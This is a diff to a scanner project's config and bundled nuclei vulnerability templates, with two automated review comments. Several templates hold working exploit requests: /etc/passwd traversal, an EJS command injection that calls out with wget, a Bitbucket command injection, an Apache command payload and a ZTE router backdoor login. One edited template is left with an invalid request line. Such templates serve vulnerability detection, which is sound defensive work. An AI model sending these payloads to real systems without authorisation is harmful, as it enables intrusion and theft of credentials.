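--- a/config/config.json
+++ b/config/config.json
@@ -99,7 +99,7 @@
   "CheckWeakPassword": true,
   "esthread": 8,
   "hydrathread": 64,
-  "Fuzzthreads": 32,
+  "Fuzzthreads": 16,
   "enableFingerTitleHeaderMd5Hex": false,
   "Cookie": "",
   "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s",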
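--- a/config/config_me.json
+++ b/config/config_me.json
@@ -82,7 +82,7 @@
   "FollowRedirects": false,
   "MaxRedirects": 3
   },
-  "enableEsSv": false,
+  "enableEsSv": true,
   "CheckWeakPassword": true,
   "esthread": 8,
   "hydrathread": 64,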
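Review bot: Flipping `enableEsSv` to `true` in config_me.json turns on the Elasticsearch result sink by default, but nothing in this commit shows the endpoint or any credentials that sink will use; the only `esUrl` visible is the plain-http `http://127.0.0.1:9200/%s_index/_doc/%s` in config.json. Scan results written there can include weak-password findings (`CheckWeakPassword` is `true` in the same file), so the index should only be reachable over an authenticated, non-exposed endpoint before this becomes the shipped default. Strict JSON has no comment syntax, so the expectation that `esUrl` points at a localhost or authenticated cluster is best recorded next to the `enableEsSv`/`esUrl` keys in the project README; the rest of config_me.json, including its own `esUrl`, is outside this hunk.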
    config/nuclei-templates/README.md
    skipped 41 lines
    42 42   
    43 43  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    44 44  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    45  -| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
    46  -| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
    47  -| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
    48  -| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
    49  -| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
    50  -| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
    51  -| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
    52  -| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
    53  -| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
    54  -| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
     45 +| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
     46 +| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
     47 +| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
     48 +| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
     49 +| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
     50 +| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
     51 +| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
     52 +| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
     53 +| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
     54 +| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
    55 55   
    56  -**296 directories, 4231 files**.
     56 +**297 directories, 4270 files**.
    57 57   
    58 58  </td>
    59 59  </tr>
    skipped 38 lines
  • config/nuclei-templates/TEMPLATES-STATS.json
  • config/nuclei-templates/TEMPLATES-STATS.md
    config/nuclei-templates/TOP-10.md
    1 1  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    2 2  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    3  -| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
    4  -| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
    5  -| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
    6  -| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
    7  -| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
    8  -| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
    9  -| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
    10  -| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
    11  -| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
    12  -| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
     3 +| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
     4 +| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
     5 +| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
     6 +| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
     7 +| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
     8 +| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
     9 +| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
     10 +| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
     11 +| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
     12 +| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
    13 13   
    config/nuclei-templates/cves/2015/CVE-2015-3035.yaml
     1 +id: CVE-2015-3035
     2 + 
     3 +info:
     4 + name: Multiple TP-LINK Products Vulnerable - Local File Inclusion
     5 + author: 0x_Akoko
     6 + severity: high
     7 + description: |
     8 + Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
     9 + reference:
     10 + - https://seclists.org/fulldisclosure/2015/Apr/26
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3035
     12 + - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt
     13 + - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware
     14 + classification:
     15 + cve-id: CVE-2015-3035
     16 + metadata:
     17 + shodan-query: http.title:"TP-LINK"
     18 + verified: "true"
     19 + tags: router,lfi,seclists,cve,cve2015,tplink,kev
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - "{{BaseURL}}/login/../../../etc/passwd"
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: regex
     29 + regex:
     30 + - "root:[x*]:0:0"
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
    config/nuclei-templates/cves/2021/CVE-2021-24214.yaml
    1 1  id: CVE-2021-24214
    2 2  info:
    3  - name: OpenID Connect Generic Client 3.8.0-3.8.1 - Reflected Cross Site Scripting (XSS) via Login Error
     3 + name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting
    4 4   author: tess
    5 5   severity: medium
    6  - description: The OpenID Connect Generic Client WordPress plugin 3.8.0 and 3.8.1 did not sanitise the login error when output back in the login form, leading to a reflected Cross-Site Scripting issue. This issue does not require authentication and can be exploited with the default configuration.
     6 + description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.
    7 7   reference:
    8 8   - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10
     9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
    9 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24214
    10  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 26 lines
    40 40   status:
    41 41   - 200
    42 42   
     43 +# Enhanced by md on 2022/09/19
     44 + 
    config/nuclei-templates/cves/2021/CVE-2021-42013.yaml
    skipped 41 lines
    42 42   Origin: {{BaseURL}}
    43 43   Content-Type: application/x-www-form-urlencoded
    44 44   
    45  - echo Echo: CVE-2021-42013; echo; {{cmd}};
     45 + echo Content-Type: text/plain; echo; {{cmd}}
    46 46   
    47 47   stop-at-first-match: true
    48 48   unsafe: true
    49 49   matchers-condition: or
    50 50   matchers:
    51  - 
    52 51   - type: regex
    53 52   name: LFI
    54 53   regex:
    skipped 9 lines
    config/nuclei-templates/cves/2022/CVE-2022-0678.yaml
    1 1  id: CVE-2022-0678
    2 2   
    3 3  info:
    4  - name: Microweber < 1.2.11- Cross-Site Scripting
     4 + name: Packagist <1.2.11 - Cross-Site Scripting
    5 5   author: tess
    6 6   severity: medium
    7 7   description: |
    8  - Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
     8 + Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
    9 9   reference:
    10 10   - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
    11 11   - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
    12  - - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
    13 12   - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 16   cvss-score: 6.1
    skipped 27 lines
    44 44   status:
    45 45   - 404
    46 46   
     47 +# Enhanced by md on 2022/09/19
     48 + 
    config/nuclei-templates/cves/2022/CVE-2022-2544.yaml
     1 +id: CVE-2022-2544
     2 +info:
     3 + name: Ninja Job Board < 1.3.3 - Resume Disclosure via Directory Listing
     4 + author: tess
     5 + severity: high
     6 + description: The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated Directory Listing which allows the download of uploaded resumes.
     7 + reference:
     8 + - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php
     9 + - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053
     10 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2544
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     14 + cvss-score: 7.5
     15 + cve-id: CVE-2022-2544
     16 + cwe-id: CWE-425
     17 + metadata:
     18 + verified: true
     19 + tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - "{{BaseURL}}/wp/wp-content/uploads/wpjobboard/"
     25 + - "{{BaseURL}}/wp-content/uploads/wpjobboard/"
     26 + 
     27 + stop-at-first-match: true
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - "Index of /wp/wp-content/uploads/wpjobboard"
     34 + - "Index of /wp-content/uploads/wpjobboard"
     35 + 
     36 + - type: word
     37 + part: header
     38 + words:
     39 + - "text/html"
     40 + 
     41 + - type: status
     42 + status:
     43 + - 200
     44 + 
    config/nuclei-templates/cves/2022/CVE-2022-29078.yaml
     1 +id: CVE-2022-29078
     2 + 
     3 +info:
     4 + name: Ejs - RCE
     5 + author: For3stCo1d
     6 + severity: critical
     7 + description: |
     8 + The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
     9 + reference:
     10 + - https://eslam.io/posts/ejs-server-side-template-injection-rce/
     11 + - https://github.com/miko550/CVE-2022-29078
     12 + - https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29078
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2022-29078
     18 + cwe-id: CWE-74
     19 + tags: cve,cve2022,rce,ejs,nodejs,oast
     20 + 
     21 +requests:
     22 + - raw:
     23 + - |
     24 + GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
     25 + Host: {{Hostname}}
     26 + 
     27 + matchers-condition: and
     28 + matchers:
     29 + - type: word
     30 + part: interactsh_protocol # Confirms the HTTP Interaction
     31 + words:
     32 + - "http"
     33 + 
     34 + - type: word
     35 + part: body
     36 + words:
     37 + - "You are viewing page number"
     38 + 
    config/nuclei-templates/cves/2022/CVE-2022-34121.yaml
     1 +id: CVE-2022-34121
     2 + 
     3 +info:
     4 + name: CuppaCMS v1.0 - Local File Inclusion
     5 + author: edoardottt
     6 + severity: high
     7 + description: |
     8 + Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.
     9 + reference:
     10 + - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34121
     12 + - https://github.com/CuppaCMS/CuppaCMS/issues/18
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     15 + cvss-score: 7.5
     16 + cve-id: CVE-2022-34121
     17 + cwe-id: CWE-829
     18 + metadata:
     19 + verified: "true"
     20 + tags: cve,cve2022,lfi,cuppa,cms
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /templates/default/html/windows/right.php HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + url=../../../../../../../../../../../../etc/passwd
     30 + 
     31 + matchers-condition: and
     32 + matchers:
     33 + - type: regex
     34 + regex:
     35 + - "root:[x*]:0:0"
     36 + 
     37 + - type: status
     38 + status:
     39 + - 200
     40 + 
    config/nuclei-templates/cves/2022/CVE-2022-36804.yaml
     1 +id: CVE-2022-36804
     2 + 
     3 +info:
     4 + name: Atlassian Bitbucket Command Injection Vulnerability
     5 + author: DhiyaneshDk,tess,sullo
     6 + severity: high
     7 + description: |
     8 + Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.
     9 + reference:
     10 + - https://github.com/notdls/CVE-2022-36804
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36804
     12 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
     13 + - https://jira.atlassian.com/browse/BSERV-13438
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 8.8
     17 + cve-id: CVE-2022-36804
     18 + cwe-id: CWE-77
     19 + metadata:
     20 + shodan-query: http.component:"BitBucket"
     21 + tags: cve,cve2022,bitbucket,atlassian
     22 + 
     23 +variables:
     24 + data: '{{rand_base(5)}}'
     25 + 
     26 +requests:
     27 + - raw:
     28 + - |
     29 + GET /rest/api/latest/repos HTTP/1.1
     30 + Host: {{Hostname}}
     31 + 
     32 + - |
     33 + GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1
     34 + Host: {{Hostname}}
     35 + 
     36 + iterate-all: true
     37 + extractors:
     38 + - type: json # type of the extractor
     39 + part: body
     40 + name: key
     41 + json:
     42 + - '.["values"] | .[] | .["project"] | .key'
     43 + internal: true
     44 + 
     45 + - type: json # type of the extractor
     46 + part: body
     47 + name: slug
     48 + json:
     49 + - '.["values"] | .[] | .slug'
     50 + internal: true
     51 + 
     52 + - type: regex
     53 + group: 1
     54 + regex:
     55 + - 'uid=.*\(([a-z]+)\):'
     56 + 
     57 + stop-at-first-match: true
     58 + matchers-condition: and
     59 + matchers:
     60 + - type: word
     61 + words:
     62 + - "com.atlassian.bitbucket.scm.CommandFailedException"
     63 + 
     64 + - type: status
     65 + status:
     66 + - 500
    config/nuclei-templates/cves/2022/CVE-2022-39960.yaml
     1 +id: CVE-2022-39960
     2 + 
     3 +info:
     4 + name: Atlassian Jira addon Netic Group Export < 1.0.3 - Unauthenticated Access
     5 + author: For3stCo1d
     6 + severity: medium
     7 + description: |
     8 + The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.
     9 + reference:
     10 + - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
     11 + - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-39960
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     15 + cvss-score: 5.3
     16 + cve-id: CVE-2022-39960
     17 + cwe-id: CWE-862
     18 + metadata:
     19 + shodan-query: http.component:"Atlassian Jira"
     20 + verified: "true"
     21 + tags: cve,cve2022,atlassian,jira,netic,unauth
     22 + 
     23 +requests:
     24 + - raw:
     25 + - |
     26 + POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
     27 + Host: {{Hostname}}
     28 + Content-Type: application/x-www-form-urlencoded
     29 + 
     30 + groupexport_searchstring=&groupexport_download=true
     31 + 
     32 + matchers-condition: and
     33 + matchers:
     34 + - type: word
     35 + part: body
     36 + words:
     37 + - '"jiraGroupObjects"'
     38 + - '"groupName"'
     39 + condition: and
     40 + 
     41 + - type: word
     42 + part: header
     43 + words:
     44 + - "attachment"
     45 + - "jira-group-export"
     46 + condition: and
     47 + 
     48 + - type: status
     49 + status:
     50 + - 200
     51 + 
    config/nuclei-templates/miscellaneous/addeventlistener-detect.yaml
    1 1  id: addeventlistener-detect
    2 2   
    3 3  info:
    4  - name: DOM EventListener detection
     4 + name: DOM EventListener - Cross-Site Scripting
    5 5   author: yavolo,dwisiswant0
    6 6   severity: info
     7 + description: EventListener contains a cross-site scripting vulnerability via the document object model (DOM). An attacker can execute arbitrary script which can then allow theft of cookie-based authentication credentials and launch of other attacks.
    7 8   reference:
    8 9   - https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     12 + cvss-score: 7.2
     13 + cwe-id: CWE-79
    9 14   tags: xss,misc
    10 15   
    11 16  requests:
    skipped 7 lines
    19 24   regex:
    20 25   - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118
    21 26   
     27 +# Enhanced by md on 2022/09/19
     28 + 
    config/nuclei-templates/misconfiguration/bitbucket-public-repository.yaml
     1 +id: bitbucket-public-repository
     2 + 
     3 +info:
     4 + name: Atlassian Bitbucket Public Repository Exposure
     5 + author: DhiyaneshDk
     6 + severity: low
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.component:"Bitbucket"
     10 + tags: misconfig,bitbucket
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/repos?visibility=public"
     16 + - "{{BaseURL}}/bitbucket/repos?visibility=public"
     17 + 
     18 + stop-at-first-match: true
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - 'Public Repositories - Bitbucket'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - "text/html"
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
    config/nuclei-templates/misconfiguration/xss-deprecated-header.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: XSS-Protection Header - Cross-Site Scripting
    5 5   author: joshlarsen
    6  - severity: high
    7  - description: XSS-Protection header in Explorer, Chrome, and Safari contains a cross-site scripting vulnerability if set to any value other than `0`.
     6 + severity: info
     7 + description: Setting the XSS-Protection header is deprecated. Setting the header to anything other than `0` can actually introduce an XSS vulnerability.
    8 8   reference:
    9 9   - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection
    10 10   - https://owasp.org/www-project-secure-headers/#x-xss-protection
    11 11   classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    13  - cvss-score: 7.2
    14  - cwe-id: CWE-79
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     13 + cvss-score: 0.0
    15 14   tags: xss,misconfig,generic
    16 15   
    17 16  requests:
    skipped 26 lines
    config/nuclei-templates/network/backdoor/backdoored-zte.yaml
     1 +id: backdoored-zte
     2 + 
     3 +info:
     4 + name: Backdoored ZTE Routers
     5 + author: its0x08
     6 + severity: high
     7 + description: |
     8 + Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
     9 + reference:
     10 + - https://www.exploit-db.com/ghdb/7179
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.html:"ZTE Corporation"
     14 + tags: edb,network,zte,telnet,backdoor,router
     15 + 
     16 +network:
     17 + - host:
     18 + - "{{Hostname}}"
     19 + - "{{Host}}:23"
     20 + 
     21 + inputs:
     22 + - data: "root\r\n"
     23 + - data: "Zte521\r\n\r\n"
     24 + read: 1024
     25 + 
     26 + matchers:
     27 + - type: word
     28 + words:
     29 + - "BusyBox"
     30 + 
     31 + extractors:
     32 + - type: regex
     33 + regex:
     34 + - '[A-Z]{1,}[0-9]{3,4}'
     35 + 
    config/nuclei-templates/ssl/detect-ssl-issuer.yaml
     1 +id: detect-ssl-issuer
     2 + 
     3 +info:
     4 + name: Detect SSL Certificate Issuer
     5 + author: Lingtren
     6 + severity: info
     7 + tags: ssl
     8 + 
     9 +ssl:
     10 + - address: "{{Host}}:{{Port}}"
     11 + 
     12 + extractors:
     13 + - type: json
     14 + json:
     15 + - " .issuer_organization[]"
     16 + 
    config/nuclei-templates/vulnerabilities/drupal/drupal-avatar-xss.yaml
    1 1  id: drupal-avatar-xss
    2 2   
    3 3  info:
    4  - name: Drupal avatar_uploader v7.x-1.0-beta8 - Cross-Site Scripting
     4 + name: Drupal Avatar Uploader - Cross-Site Scripting
    5 5   author: bywalks
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
     8 + Drupal Avatar Uploader v7.x-1.0-beta8 plugin contains a cross-site scripting vulnerability in the slider import search feature and tab parameter via plugin settings.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/50841
    11  - tags: xss,drupal,edb
     11 + - https://packetstormsecurity.com/files/166409/Drupal-Avatar-Upload-7.x-1.0-beta8-Cross-Site-Scripting.html
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     14 + cvss-score: 7.2
     15 + cwe-id: CWE-79
     16 + tags: xss,drupal,edb,packetstorm
    12 17   
    13 18  requests:
    14 19   - method: GET
    skipped 17 lines
    32 37   status:
    33 38   - 200
    34 39   
     40 +# Enhanced by md on 2022/09/19
     41 + 
    config/nuclei-templates/vulnerabilities/generic/cors-misconfig.yaml
    skipped 12 lines
    13 13  requests:
    14 14   - raw:
    15 15   - |
    16  - GET / HTTP/1.1
    17  - Host: {{Hostname}}
    18  - Origin: {{cors_origin}}
    19  - - |
    20  - GET {{path}} HTTP/1.1
     16 + GET HTTP/1.1
    21 17   Host: {{Hostname}}
    22 18   Origin: {{cors_origin}}
    23 19   
    skipped 10 lines
    34 30   - "http://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain over http
    35 31   
    36 32   stop-at-first-match: true
    37  - matchers-condition: or
    38 33   matchers:
    39 34   - type: dsl
    40 35   name: arbitrary-origin
    skipped 5 lines
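Review bot: The rewritten request line at new line 16 reads `GET HTTP/1.1`, which has no request-target and is not a valid HTTP/1.1 request line; most servers will reject it before any CORS processing, so the `arbitrary-origin` dsl matcher at new line 35 would presumably never see a reflected `Origin` and the template silently stops detecting anything. If the intent was to collapse the old `/` and `{{path}}` requests into one, the line should be `GET / HTTP/1.1`. The second hunk also drops `matchers-condition: or` (old line 37) while the matchers list continues past the hunk; if more than one matcher remains, confirm the engine's default condition is the one the template relied on. The enclosing `requests` and `matchers` blocks both extend outside this hunk.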
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
    1 1  id: gnuboard-sms-xss
    2 2   
    3 3  info:
    4  - name: Gnuboard CMS - SMS Emoticon Cross-Site Scripting
     4 + name: Gnuboard CMS - Cross-Site Scripting
    5 5   author: gy741
    6 6   severity: medium
    7  - description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
     7 + description: Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
    8 8   reference:
    9 9   - https://sir.kr/g5_pds/4788?page=5
    10 10   - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    11 15   metadata:
    12 16   verified: true
    13 17   shodan-query: http.html:"Gnuboard"
    skipped 20 lines
    34 38   status:
    35 39   - 200
    36 40   
     41 +# Enhanced by md on 2022/09/19
     42 + 
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
    1 1  id: gnuboard5-rxss
    2 2   
    3 3  info:
    4  - name: Gnuboard5 - Cross-Site Scripting
     4 + name: Gnuboard 5 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Gnuboard 5 is vulnerable to reflected XSS via $_GET['LGD_OID'].
     8 + Gnuboard 5 contains a cross-site scripting vulnerability via the $_GET['LGD_OID'] parameter.
    9 9   reference:
    10 10   - https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
     11 + - https://vulners.com/huntr/25775287-88CD-4F00-B978-692D627DFF04
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     14 + cvss-score: 7.2
     15 + cwe-id: CWE-79
    11 16   metadata:
    12 17   verified: true
    13 18   shodan-query: http.html:"gnuboard5"
    skipped 19 lines
    33 38   status:
    34 39   - 200
    35 40   
     41 +# Enhanced by md on 2022/09/19
     42 + 
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml
    1 1  id: gnuboard5-xss
    2 2   
    3 3  info:
    4  - name: Gnuboard5 - Cross-Site Scripting
     4 + name: Gnuboard 5 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Gnuboard 5 is vulnerable to reflected XSS to a flaw in the clean_xss_tags() function called in new.php.
     8 + Gnuboard 5 contains a cross-site scripting vulnerability via the clean_xss_tags() function called in new.php.
    9 9   reference:
    10 10   - https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    11 15   metadata:
    12 16   verified: true
    13 17   shodan-query: http.html:"gnuboard5"
    skipped 19 lines
    33 37   status:
    34 38   - 200
    35 39   
     40 +# Enhanced by md on 2022/09/19
     41 + 
    config/nuclei-templates/vulnerabilities/httpbin/httpbin-xss.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: HTTPBin - Cross-Site Scripting
    5 5   author: Adam Crosser
    6  - severity: medium
     6 + severity: high
     7 + description: HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    7 8   reference:
    8 9   - https://github.com/postmanlabs/httpbin
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     12 + cvss-score: 7.2
     13 + cwe-id: CWE-79
    9 14   metadata:
    10 15   shodan-query:
    11 16   - html:"https://github.com/requests/httpbin"
    skipped 21 lines
    33 38   status:
    34 39   - 200
    35 40   
     41 +# Enhanced by md on 2022/09/19
     42 + 
    config/nuclei-templates/vulnerabilities/ibm/eclipse-help-system-xss.yaml
    1 1  id: eclipse-help-system-xss
    2 2   
    3 3  info:
    4  - name: Eclipse Help System Cross-Site Scripting
     4 + name: IBM Eclipse Help System - Cross-Site Scripting
    5 5   author: pikpikcu
